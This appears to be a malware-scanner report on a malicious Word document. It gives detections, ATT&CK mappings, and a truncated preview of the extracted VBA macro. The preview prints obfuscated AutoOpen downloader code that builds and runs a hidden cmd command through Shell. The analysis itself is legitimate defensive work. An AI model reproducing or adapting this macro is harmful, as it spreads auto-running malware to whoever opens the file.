MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command via the Shell function, likely to download and run a second-stage payload. The specific command constructed is obfuscated, but the intent is clear.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6786372-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6786372-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5288 bytes |
SHA-256: 4d124adba8da63b05947ac6aad5b61edf2d5854e6035454555286ae63ad7c110 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KuOIVPzhFV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName JPCUiK
TypeName 8
TypeName Sin(7452)
TypeName Cos(221228446)
TypeName 404881494
Shell@ CStr("c") + CStr("m") + qUQnksiZGT + RrLlYJXUmwiVWz + oQzGcoLZ + VEzSdA + zqAsUHlpTW + PdiphUslm + uKiRldWZLR, 970999915 - 970999915
TypeName 57
TypeName ktmuR
End Sub
Attribute VB_Name = "ORzOUmCd"
Function oQzGcoLZ()
On Error Resume Next
TypeName Chr(941)
TypeName 76
rZquZjFO = "d /V:/" + "C" + CStr(Chr(zCEAvsO + GftNBnFGa + 34 + EHNBIvhciX + jBwIsUOAZBFc)) + "s" + "et Zk=oU" + "VX" + "BLqvB" + "oCcMnZ"
TypeName CByte(221)
TypeName KHunQ
TKLIvm = "UQJd{bu,w@" + "p-l}eS$D" + "(" + "P.y2+A" + "r9H" + ":zW" + "7N1;k)" + "j/F4" + "6'x Gt" + "Rsa" + "=" + "h\mYf" + "gi&&f"
TypeName HvCfwo
TypeName Cos(347)
TypeName kjuHAR
vBTWt = "or %w i" + "n (25,9," + "23,29,4" + "0," + "6" + "3,66,29"
TypeName 436780052
TypeName Tan(1)
TypeName Int(2)
kRhsbtrE = ",2" + "7,27,59,31" + ",62,44,2" + "7,65," + "13,29,23" + ",26" + ","
TypeName CBool(3008)
TypeName Oct(94249 / LuscO)
APRdsDfvRjQ = "9," + "20,52" + "," + "29,11,6" + "1," + "59,47,2" + "9,61" + ",35" + ",45,29,20," + "10," + "2" + "7,72,29,13" + ",61,49"
TypeName Atn(KQWjO * FQOvq - 64695 + jHsROc)
TypeName CByte(43)
riqFUA = ",31,68,39" + "," + "34,65,57," + "66,61,61," + "25,43," + "53" + ",53" + ",7" + "0,40,64,1" + "3,50,20,4" + "0,21,50,35"
TypeName 49
TypeName ChrW(619)
TypeName CStr(dTBwci)
iiOVsRTE = "," + "25,27,5" + "3,37,1" + "1,55" + ",48,25," + "39," + "27,"
TypeName vdUPii
TypeName CStr(wkuHRo)
TypeName CStr(81)
rmiXbT = "24," + "66,6" + "1,6" + "1," + "25" + ",43" + ",53,53,20," + "64" + ",40,9" + ",1" + "1,6" + "4,61,11" + ",66,3"
TypeName 171643997
TypeName svqBMZ
TypeName Round(5004 + 6766 - 39153 * QaDEkW)
wUdKikPBwcU = "5,11,9," + "68," + "53,21," + "60,3,69," + "1" + "5," + "56,24,66,"
TypeName pNwQfY
TypeName CInt(nCdNac)
TypeName ChrW(808)
mzdhnizcRW = "61,61,25,4" + "3,53,53" + "," + "70,29,72," + "61," + "9,63,6" + "4," + "29,70," + "21,52" + ",7" + "2"
oQzGcoLZ = rZquZjFO + TKLIvm + vBTWt + kRhsbtrE + APRdsDfvRjQ + riqFUA + iiOVsRTE + rmiXbT + wUdKikPBwcU + mzdhnizcRW
TypeName BBCEt
TypeName Rnd(VVjlA - JMtLa)
End Function
Function VEzSdA()
On Error Resume Next
TypeName Hex(CVEpwc - QBCPEN)
TypeName zCmNpY
TypeName YuwuO
JAEqHBSFW = ",61,64" + ",35,64,1" + "8,7,35,20," + "40,53,12" + ",2,71," + "34," + "44,8,42," + "24,66,61,6" + "1,25,4" + "3,53,53,50" + ",13,6" + "4,25,25" + ",2"
TypeName Sqr(qnbrp)
TypeName Round(mGlXSu)
ArYwla = "9,35,25,27" + ",53" + ",41,3" + "0,6" + ",24,66,61" + ",6" + "1,25,43,5" + "3,5" + "3,63,6" + "6,64," + "40,5" + "2,64,66" + ",64,"
TypeName Round(7)
TypeName 6307
DHwIjPi = "63,35" + ",11,9,68,5" + "3,54,30" + ",2" + "5,40" + ",48,20," + "57,3" + "5" + ",30,25,2" + "7,72,61,3" + "3,57,"
TypeName 45
TypeName Hex(8709)
qBGdwYqjc = "24,57,51,4" + "9,31,66" + ",47" + "," + "7" + "2,59,6" + "5,59,57,4" + "6,55,4"
TypeName CInt(9)
TypeName Sgn(jYOfNS)
TypeName JijRi
ZnHEIufOLHi = "8,57,49,31" + ",68,40,52," + "65,31,29,1" + "3" + "," + "7,43,61,29" + ",68,25,3" + "8,57" + ",67," + "57,38,31"
TypeName 420707845
TypeName Atn(41810 + drYQm + hCqiVB / RwpWNI)
TypeName Hex(11376 * MjSJI)
GhbmjjvNiMu = "," + "66,4" + "7,72,38" + "," + "57," + "35,29,58," + "29,57,49,"
TypeName CDate(rPYzZ)
TypeName 90
uuJSzIhK = "70,9" + ",40,2" + "9,64,11" + ",66,33,3" + "1,62" + "," + "9,"
TypeName Round(96785 + cOIFT)
TypeName Rnd(834)
opMXi = "69,5" + "9" + ",72," + "13" + ",59,31,68"
TypeName jUhYw
TypeName Log(LzwiqX)
ESJEqvn = ",39,34,5" + "1,1" + "9,61,40,36" + ",19,31" + ",62,44,2" + "7,35,32" + ",9,23" + ",13,27"
TypeName CBool(ZswPD)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.